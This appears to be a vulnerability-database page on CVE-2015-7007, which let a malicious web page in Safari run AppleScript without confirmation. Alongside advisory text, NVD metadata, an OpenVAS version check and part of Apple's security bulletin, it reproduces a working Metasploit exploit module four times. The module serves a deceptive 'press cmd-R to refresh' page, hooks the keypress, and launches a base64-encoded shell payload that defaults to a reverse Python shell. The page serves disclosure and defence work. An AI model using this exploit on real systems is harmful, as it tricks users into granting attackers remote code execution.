A vulnerability in the OS X Script Editor allows a malicious web page to execute arbitrary AppleScript code without user confirmation by enticing a user to type Control-R in Safari.
Resolution
Upgrade to OS X 10.11.1 or apply Security Update 2015-007.
References
<https://support.apple.com/en-us/HT205375>
Limitations
A user must load the exploit page in Safari and type Control-R in order for the exploit to succeed.
Platforms
Mac OS X
Title: Safari Script Editor AppleScript execution
Added: 11/02/2015
CVE: [CVE-2015-7007](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7007>)
BID: [77266](<http://www.securityfocus.com/bid/77266>)
Reporter: SAINT Corporation
ID: SAINT:6D0303C56098956018FAC37F887992D7
CVSS: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Source: http://download.saintcorporation.com/cgi-bin/exploit_info/safari_script_editor_exec
Related: CVE-2015-7007, SAINT:612676C46CB6AE7358500CFF2EF98126, SAINT:79F02719BFAE256DF9977E552B9FBF77, EDB-ID:38535, PACKETSTORM:134072, 1337DAY-ID-24435, MSF:EXPLOIT/OSX/BROWSER/SAFARI_USER_ASSISTED_APPLESCRIPT_EXEC, OPENVAS:1361412562310806148, MACOSX_10_11_1.NASL, SECURITYVULNS:VULN:14702, SECURITYVULNS:DOC:32566
Background
[Safari](<http://www.apple.com/safari/>) is a web browser for Mac OS X and Windows.
{"cve": [{"lastseen": "2021-02-02T06:21:29", "description": "Script Editor in Apple OS X before 10.11.1 allows remote attackers to bypass an intended user-confirmation requirement for AppleScript execution via unspecified vectors.", "edition": 6, "cvss3": {}, "published": "2015-10-23T21:59:00", "title": "CVE-2015-7007", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7007"], "modified": "2016-12-24T02:59:00", "cpe": ["cpe:/o:apple:mac_os_x:10.11.0"], "id": "CVE-2015-7007", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7007", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.11.0:*:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2016-10-03T15:01:55", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7007"], "description": "Added: 11/02/2015 \nCVE: [CVE-2015-7007](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7007>) \nBID: [77266](<http://www.securityfocus.com/bid/77266>) \n\n\n### Background\n\n[Safari](<http://www.apple.com/safari/>) is a web browser for Mac OS X and Windows. \n\n### Problem\n\nA vulnerability in the OS X Script Editor allows a malicious web page to execute arbitrary AppleScript code without user confirmation by enticing a user to type Control-R in Safari. \n\n### Resolution\n\nUpgrade to OS X 10.11.1 or apply Security Update 2015-007. 
\n\n### References\n\n<https://support.apple.com/en-us/HT205375> \n\n\n### Limitations\n\nA user must load the exploit page in Safari and type Control-R in order for the exploit to succeed. \n\n### Platforms\n\nMac OS X \n \n\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SAINT:612676C46CB6AE7358500CFF2EF98126", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/safari_script_editor_exec", "type": "saint", "title": "Safari Script Editor AppleScript execution", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-06-04T23:19:39", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7007"], "description": "Added: 11/02/2015 \nCVE: [CVE-2015-7007](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7007>) \nBID: [77266](<http://www.securityfocus.com/bid/77266>) \n\n\n### Background\n\n[Safari](<http://www.apple.com/safari/>) is a web browser for Mac OS X and Windows. \n\n### Problem\n\nA vulnerability in the OS X Script Editor allows a malicious web page to execute arbitrary AppleScript code without user confirmation by enticing a user to type Control-R in Safari. \n\n### Resolution\n\nUpgrade to OS X 10.11.1 or apply Security Update 2015-007. \n\n### References\n\n<https://support.apple.com/en-us/HT205375> \n\n\n### Limitations\n\nA user must load the exploit page in Safari and type Control-R in order for the exploit to succeed. 
\n\n### Platforms\n\nMac OS X \n \n\n", "edition": 4, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SAINT:79F02719BFAE256DF9977E552B9FBF77", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/safari_script_editor_exec", "title": "Safari Script Editor AppleScript execution", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:17", "description": "", "published": "2015-10-23T00:00:00", "type": "packetstorm", "title": "Safari User-Assisted Applescript Exec Attack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7007"], "modified": "2015-10-23T00:00:00", "id": "PACKETSTORM:134072", "href": "https://packetstormsecurity.com/files/134072/Safari-User-Assisted-Applescript-Exec-Attack.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::Remote::BrowserExploitServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Safari User-Assisted Applescript Exec Attack', \n'Description' => %q{ \nIn versions of Mac OS X before 10.11.1, the applescript:// URL \nscheme is provided, which opens the provided script in the Applescript \nEditor. Pressing cmd-R in the Editor executes the code without any \nadditional confirmation from the user. By getting the user to press \ncmd-R in Safari, and by hooking the cmd-key keypress event, a user \ncan be tricked into running arbitrary Applescript code. \n \nGatekeeper should be disabled from Security & Privacy in order to \navoid the unidentified Developer prompt. 
\n}, \n'License' => MSF_LICENSE, \n'Arch' => ARCH_CMD, \n'Platform' => ['unix', 'osx'], \n'Compat' => \n{ \n'PayloadType' => 'cmd' \n}, \n'Targets' => \n[ \n[ 'Mac OS X', {} ] \n], \n'DefaultOptions' => { 'payload' => 'cmd/unix/reverse_python' }, \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Oct 16 2015', \n'Author' => [ 'joev' ], \n'References' => \n[ \n[ 'CVE', '2015-7007' ], \n[ 'URL', 'https://support.apple.com/en-us/HT205375' ] \n], \n'BrowserRequirements' => { \n:source => 'script', \n:ua_name => HttpClients::SAFARI, \n:os_name => OperatingSystems::Match::MAC_OSX \n} \n)) \n \nregister_options([ \nOptString.new('CONTENT', [false, \"Content to display in browser\", \n\"This page has failed to load. Press cmd-R to refresh.\"]), \nOptString.new('WritableDir', [true, 'Writable directory', '/.Trashes']) \n], self.class) \nend \n \ndef on_request_exploit(cli, request, profile) \nprint_status(\"Sending #{self.name}\") \nsend_response_html(cli, exploit_html) \nend \n \ndef exploit_html \n\"<!doctype html><html><body>#{content}<script>#{exploit_js}</script></body></html>\" \nend \n \ndef exploit_js \njs_obfuscate %Q| \nvar as = Array(150).join(\"\\\\n\") + \n'do shell script \"echo #{Rex::Text.encode_base64(sh)} \\| base64 --decode \\| /bin/sh\"'; \nvar url = 'applescript://com.apple.scripteditor?action=new&script='+encodeURIComponent(as); \nwindow.onkeydown = function(e) { \nif (e.keyCode == 91) { \nwindow.location = url; \n} \n}; \n| \nend \n \ndef sh \n'killall \"Script Editor\"; nohup ' + payload.encoded \nend \n \ndef content \ndatastore['CONTENT'] \nend \n \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/134072/safari_user_assisted_applescript_exec.rb.txt"}], "zdt": [{"lastseen": "2018-04-01T21:30:55", "description": "Exploit for macOS platform in category remote exploits", "edition": 2, "published": "2015-10-26T00:00:00", "type": "zdt", 
"title": "Safari User-Assisted Applescript Exec Attack Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7007"], "modified": "2015-10-26T00:00:00", "id": "1337DAY-ID-24435", "href": "https://0day.today/exploit/description/24435", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n \r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Safari User-Assisted Applescript Exec Attack',\r\n 'Description' => %q{\r\n In versions of Mac OS X before 10.11.1, the applescript:// URL\r\n scheme is provided, which opens the provided script in the Applescript\r\n Editor. Pressing cmd-R in the Editor executes the code without any\r\n additional confirmation from the user. By getting the user to press\r\n cmd-R in Safari, and by hooking the cmd-key keypress event, a user\r\n can be tricked into running arbitrary Applescript code.\r\n \r\n Gatekeeper should be disabled from Security & Privacy in order to\r\n avoid the unidentified Developer prompt.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Arch' => ARCH_CMD,\r\n 'Platform' => ['unix', 'osx'],\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd'\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Mac OS X', {} ]\r\n ],\r\n 'DefaultOptions' => { 'payload' => 'cmd/unix/reverse_python' },\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Oct 16 2015',\r\n 'Author' => [ 'joev' ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2015-7007' ],\r\n [ 'URL', 'https://support.apple.com/en-us/HT205375' ]\r\n ],\r\n 'BrowserRequirements' => {\r\n :source => 'script',\r\n :ua_name => HttpClients::SAFARI,\r\n :os_name => OperatingSystems::Match::MAC_OSX\r\n }\r\n ))\r\n \r\n register_options([\r\n OptString.new('CONTENT', [false, \"Content to 
display in browser\",\r\n \"This page has failed to load. Press cmd-R to refresh.\"]),\r\n OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])\r\n ], self.class)\r\n end\r\n \r\n def on_request_exploit(cli, request, profile)\r\n print_status(\"Sending #{self.name}\")\r\n send_response_html(cli, exploit_html)\r\n end\r\n \r\n def exploit_html\r\n \"<!doctype html><html><body>#{content}<script>#{exploit_js}</script></body></html>\"\r\n end\r\n \r\n def exploit_js\r\n js_obfuscate %Q|\r\n var as = Array(150).join(\"\\\\n\") +\r\n 'do shell script \"echo #{Rex::Text.encode_base64(sh)} \\| base64 --decode \\| /bin/sh\"';\r\n var url = 'applescript://com.apple.scripteditor?action=new&script='+encodeURIComponent(as);\r\n window.onkeydown = function(e) {\r\n if (e.keyCode == 91) {\r\n window.location = url;\r\n }\r\n };\r\n |\r\n end\r\n \r\n def sh\r\n 'killall \"Script Editor\"; nohup ' + payload.encoded\r\n end\r\n \r\n def content\r\n datastore['CONTENT']\r\n end\r\n \r\n \r\nend\n\n# 0day.today [2018-04-01] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/24435"}], "exploitdb": [{"lastseen": "2016-02-04T08:18:24", "description": "Safari User-Assisted Applescript Exec Attack. CVE-2015-7007. 
Remote exploit for osx platform", "published": "2015-10-26T00:00:00", "type": "exploitdb", "title": "Safari User-Assisted Applescript Exec Attack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7007"], "modified": "2015-10-26T00:00:00", "id": "EDB-ID:38535", "href": "https://www.exploit-db.com/exploits/38535/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Safari User-Assisted Applescript Exec Attack',\r\n 'Description' => %q{\r\n In versions of Mac OS X before 10.11.1, the applescript:// URL\r\n scheme is provided, which opens the provided script in the Applescript\r\n Editor. Pressing cmd-R in the Editor executes the code without any\r\n additional confirmation from the user. 
By getting the user to press\r\n cmd-R in Safari, and by hooking the cmd-key keypress event, a user\r\n can be tricked into running arbitrary Applescript code.\r\n\r\n Gatekeeper should be disabled from Security & Privacy in order to\r\n avoid the unidentified Developer prompt.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Arch' => ARCH_CMD,\r\n 'Platform' => ['unix', 'osx'],\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd'\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Mac OS X', {} ]\r\n ],\r\n 'DefaultOptions' => { 'payload' => 'cmd/unix/reverse_python' },\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Oct 16 2015',\r\n 'Author' => [ 'joev' ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2015-7007' ],\r\n [ 'URL', 'https://support.apple.com/en-us/HT205375' ]\r\n ],\r\n 'BrowserRequirements' => {\r\n :source => 'script',\r\n :ua_name => HttpClients::SAFARI,\r\n :os_name => OperatingSystems::Match::MAC_OSX\r\n }\r\n ))\r\n\r\n register_options([\r\n OptString.new('CONTENT', [false, \"Content to display in browser\",\r\n \"This page has failed to load. 
Press cmd-R to refresh.\"]),\r\n OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])\r\n ], self.class)\r\n end\r\n\r\n def on_request_exploit(cli, request, profile)\r\n print_status(\"Sending #{self.name}\")\r\n send_response_html(cli, exploit_html)\r\n end\r\n\r\n def exploit_html\r\n \"<!doctype html><html><body>#{content}<script>#{exploit_js}</script></body></html>\"\r\n end\r\n\r\n def exploit_js\r\n js_obfuscate %Q|\r\n var as = Array(150).join(\"\\\\n\") +\r\n 'do shell script \"echo #{Rex::Text.encode_base64(sh)} \\| base64 --decode \\| /bin/sh\"';\r\n var url = 'applescript://com.apple.scripteditor?action=new&script='+encodeURIComponent(as);\r\n window.onkeydown = function(e) {\r\n if (e.keyCode == 91) {\r\n window.location = url;\r\n }\r\n };\r\n |\r\n end\r\n\r\n def sh\r\n 'killall \"Script Editor\"; nohup ' + payload.encoded\r\n end\r\n\r\n def content\r\n datastore['CONTENT']\r\n end\r\n\r\n\r\nend", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/38535/"}], "metasploit": [{"lastseen": "2020-10-07T21:48:04", "description": "In versions of Mac OS X before 10.11.1, the applescript:// URL scheme is provided, which opens the provided script in the Applescript Editor. Pressing cmd-R in the Editor executes the code without any additional confirmation from the user. By getting the user to press cmd-R in Safari, and by hooking the cmd-key keypress event, a user can be tricked into running arbitrary Applescript code. 
Gatekeeper should be disabled from Security & Privacy in order to avoid the unidentified Developer prompt.\n", "published": "2015-10-22T14:46:56", "type": "metasploit", "title": "Safari User-Assisted Applescript Exec Attack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7007"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/OSX/BROWSER/SAFARI_USER_ASSISTED_APPLESCRIPT_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Safari User-Assisted Applescript Exec Attack',\n 'Description' => %q{\n In versions of Mac OS X before 10.11.1, the applescript:// URL\n scheme is provided, which opens the provided script in the Applescript\n Editor. Pressing cmd-R in the Editor executes the code without any\n additional confirmation from the user. 
By getting the user to press\n cmd-R in Safari, and by hooking the cmd-key keypress event, a user\n can be tricked into running arbitrary Applescript code.\n\n Gatekeeper should be disabled from Security & Privacy in order to\n avoid the unidentified Developer prompt.\n },\n 'License' => MSF_LICENSE,\n 'Arch' => ARCH_CMD,\n 'Platform' => ['unix', 'osx'],\n 'Compat' =>\n {\n 'PayloadType' => 'cmd'\n },\n 'Targets' =>\n [\n [ 'Mac OS X', {} ]\n ],\n 'DefaultOptions' => { 'payload' => 'cmd/unix/reverse_python' },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2015-10-16',\n 'Author' => [ 'joev' ],\n 'References' =>\n [\n [ 'CVE', '2015-7007' ],\n [ 'URL', 'https://support.apple.com/en-us/HT205375' ]\n ],\n 'BrowserRequirements' => {\n :source => 'script',\n :ua_name => HttpClients::SAFARI,\n :os_name => OperatingSystems::Match::MAC_OSX\n }\n ))\n\n register_options([\n OptString.new('CONTENT', [false, \"Content to display in browser\",\n \"This page has failed to load. Press cmd-R to refresh.\"]),\n OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])\n ])\n end\n\n def on_request_exploit(cli, request, profile)\n print_status(\"Sending #{self.name}\")\n send_response_html(cli, exploit_html)\n end\n\n def exploit_html\n \"<!doctype html><html><body>#{content}<script>#{exploit_js}</script></body></html>\"\n end\n\n def exploit_js\n js_obfuscate %Q|\n var as = Array(150).join(\"\\\\n\") +\n 'do shell script \"echo #{Rex::Text.encode_base64(sh)} \\| base64 --decode \\| /bin/sh\"';\n var url = 'applescript://com.apple.scripteditor?action=new&script='+encodeURIComponent(as);\n window.onkeydown = function(e) {\n if (e.keyCode == 91) {\n window.location = url;\n }\n };\n |\n end\n\n def sh\n 'killall \"Script Editor\"; nohup ' + payload.encoded\n end\n\n def content\n datastore['CONTENT']\n end\n\n\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/browser/safari_user_assisted_applescript_exec.rb"}], "openvas": [{"lastseen": "2019-05-29T18:35:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7007", "CVE-2015-6987", "CVE-2015-7061", "CVE-2015-7059", "CVE-2015-7003", "CVE-2015-6983", "CVE-2015-7020", "CVE-2015-6994", "CVE-2015-7021", "CVE-2014-3565", "CVE-2012-6151", "CVE-2015-6995", "CVE-2015-5945", "CVE-2015-7008", "CVE-2015-7023", "CVE-2015-7015", "CVE-2015-7060", "CVE-2015-6990", "CVE-2015-6988", "CVE-2015-5943", "CVE-2015-6563", "CVE-2015-6974", "CVE-2015-7988", "CVE-2015-7019", "CVE-2015-7006", "CVE-2015-7017"], "description": "This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.", "modified": "2019-05-03T00:00:00", "published": "2015-10-29T00:00:00", "id": "OPENVAS:1361412562310806148", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806148", "type": "openvas", "title": "Apple Mac OS X Multiple Vulnerabilities-01 October-15", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Mac OS X Multiple Vulnerabilities-01 October-15\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Updated By: Shakeel <bshakeel@secpod.com> on 2018-05-15\n# For proper Version Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806148\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2015-5943\", \"CVE-2015-6983\", \"CVE-2015-7061\", \"CVE-2015-7060\",\n \"CVE-2015-7059\", \"CVE-2015-7007\", \"CVE-2015-5945\", \"CVE-2015-6563\",\n \"CVE-2014-3565\", \"CVE-2012-6151\", \"CVE-2015-7988\", \"CVE-2015-6994\",\n \"CVE-2015-6988\", \"CVE-2015-6974\", \"CVE-2015-7021\", \"CVE-2015-7020\",\n \"CVE-2015-7019\", \"CVE-2015-7008\", \"CVE-2015-6990\", \"CVE-2015-6987\",\n \"CVE-2015-6995\", \"CVE-2015-7017\", \"CVE-2015-7015\", \"CVE-2015-7023\",\n \"CVE-2015-7006\", \"CVE-2015-7003\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-10-29 12:54:16 +0530 (Thu, 29 Oct 2015)\");\n script_name(\"Apple Mac OS X Multiple Vulnerabilities-01 October-15\");\n\n script_tag(name:\"summary\", value:\"This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists. 
For details refer\n reference section.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to execute arbitrary code, overwrite cookies, elevate privileges, execute\n arbitrary code with system privileges, cause unexpected application termination,\n read kernel memory, conduct impersonation attacks, run arbitrary AppleScript,\n overwrite arbitrary files and control keychain access prompts.\");\n\n script_tag(name:\"affected\", value:\"Apple OS X El Capitan versions before\n 10.11.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade Apple OS X El Capitan to version\n 10.11.1 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT205375\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.11\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName || \"Mac OS X\" >!< osName){\n exit(0);\n}\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(osVer && osVer =~ \"^10\\.11\")\n{\n\n if(version_is_less(version:osVer, test_version:\"10.11.1\"))\n {\n report = report_fixed_ver(installed_version:osVer, fixed_version:\"10.11.1\");\n security_message(data:report);\n exit(0);\n }\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-6976", "CVE-2015-7007", "CVE-2015-0235", "CVE-2015-5927", "CVE-2015-6975", "CVE-2015-7035", "CVE-2015-6987", "CVE-2015-7003", "CVE-2015-5924", 
"CVE-2015-6983", "CVE-2015-5939", "CVE-2015-6834", "CVE-2015-6991", "CVE-2015-7020", "CVE-2015-6994", "CVE-2015-7016", "CVE-2015-6992", "CVE-2015-7021", "CVE-2015-6977", "CVE-2014-3565", "CVE-2012-6151", "CVE-2015-5934", "CVE-2015-5940", "CVE-2015-5932", "CVE-2015-0273", "CVE-2015-6995", "CVE-2015-6978", "CVE-2015-7018", "CVE-2015-6985", "CVE-2015-5935", "CVE-2015-7010", "CVE-2015-5945", "CVE-2015-6984", "CVE-2015-7008", "CVE-2015-5937", "CVE-2015-7023", "CVE-2015-6993", "CVE-2015-6836", "CVE-2015-5936", "CVE-2015-6989", "CVE-2015-5942", "CVE-2015-7015", "CVE-2015-6990", "CVE-2015-7009", "CVE-2015-6988", "CVE-2015-5943", "CVE-2015-6996", "CVE-2015-6837", "CVE-2015-6563", "CVE-2015-5944", "CVE-2015-5925", "CVE-2015-5938", "CVE-2015-6974", "CVE-2015-6835", "CVE-2015-7019", "CVE-2015-7006", "CVE-2015-7017", "CVE-2015-5926", "CVE-2015-6838", "CVE-2015-5933"], "description": "\r\n\r\nAPPLE-SA-2015-10-21-4 OS X El Capitan 10.11.1 and Security Update\r\n2015-007\r\n\r\nOS X El Capitan 10.11.1 and Security Update 2015-007 are now\r\navailable and address the following:\r\n\r\nAccelerate Framework\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Visiting a maliciously crafted website may lead to arbitrary\r\ncode execution\r\nDescription: A memory corruption issue existed in the Accelerate\r\nFramework in multi-threading mode. This issue was addressed through\r\nimproved accessor element validation and improved object locking.\r\nCVE-ID\r\nCVE-2015-5940 : Apple\r\n\r\napache_mod_php\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Multiple vulnerabilities in PHP\r\nDescription: Multiple vulnerabilities existed in PHP versions prior\r\nto 5.5.29 and 5.4.45. 
These were addressed by updating PHP to\r\nversions 5.5.29 and 5.4.45.\r\nCVE-ID\r\nCVE-2015-0235\r\nCVE-2015-0273\r\nCVE-2015-6834\r\nCVE-2015-6835\r\nCVE-2015-6836\r\nCVE-2015-6837\r\nCVE-2015-6838\r\n\r\nATS\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Visiting a maliciously crafted webpage may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in ATS. This issue\r\nwas addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-6985 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nAudio\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode\r\nDescription: An uninitialized memory issue existed in coreaudiod.\r\nThis issue was addressed through improved memory initialization.\r\nCVE-ID\r\nCVE-2015-7003 : Mark Brand of Google Project Zero\r\n\r\nAudio\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Playing a malicious audio file may lead to arbitrary code\r\nexecution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of audio files. These issues were addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-5933 : Apple\r\nCVE-2015-5934 : Apple\r\n\r\nBom\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: Unpacking a maliciously crafted archive may lead to\r\narbitrary code execution\r\nDescription: A file traversal vulnerability existed in the handling\r\nof CPIO archives. This issue was addressed through improved\r\nvalidation of metadata.\r\nCVE-ID\r\nCVE-2015-7006 : Mark Dowd of Azimuth Security\r\n\r\nCFNetwork\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: Visiting a maliciously crafted website may lead to cookies\r\nbeing overwritten\r\nDescription: A parsing issue existed when handling cookies with\r\ndifferent letter casing. 
This issue was addressed through improved\r\nparsing.\r\nCVE-ID\r\nCVE-2015-7023 : Marvin Scholz; Xiaofeng Zheng and Jinjin Liang of\r\nTsinghua University, Jian Jiang of University of California,\r\nBerkeley, Haixin Duan of Tsinghua University and International\r\nComputer Science Institute, Shuo Chen of Microsoft Research Redmond,\r\nTao Wan of Huawei Canada, Nicholas Weaver of International Computer\r\nScience Institute and University of California, Berkeley, coordinated\r\nvia CERT/CC\r\n\r\nconfigd\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A malicious application may be able to elevate privileges\r\nDescription: A heap based buffer overflow issue existed in the DNS\r\nclient library. A malicious application with the ability to spoof\r\nresponses from the local configd service may have been able to cause\r\narbitrary code execution in DNS clients.\r\nCVE-ID\r\nCVE-2015-7015 : PanguTeam\r\n\r\nCoreGraphics\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Visiting a maliciously crafted website may lead to arbitrary\r\ncode execution\r\nDescription: Multiple memory corruption issues existed in\r\nCoreGraphics. These issues were addressed through improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-5925 : Apple\r\nCVE-2015-5926 : Apple\r\n\r\nCoreText\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Processing a maliciously crafted font file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of font files. 
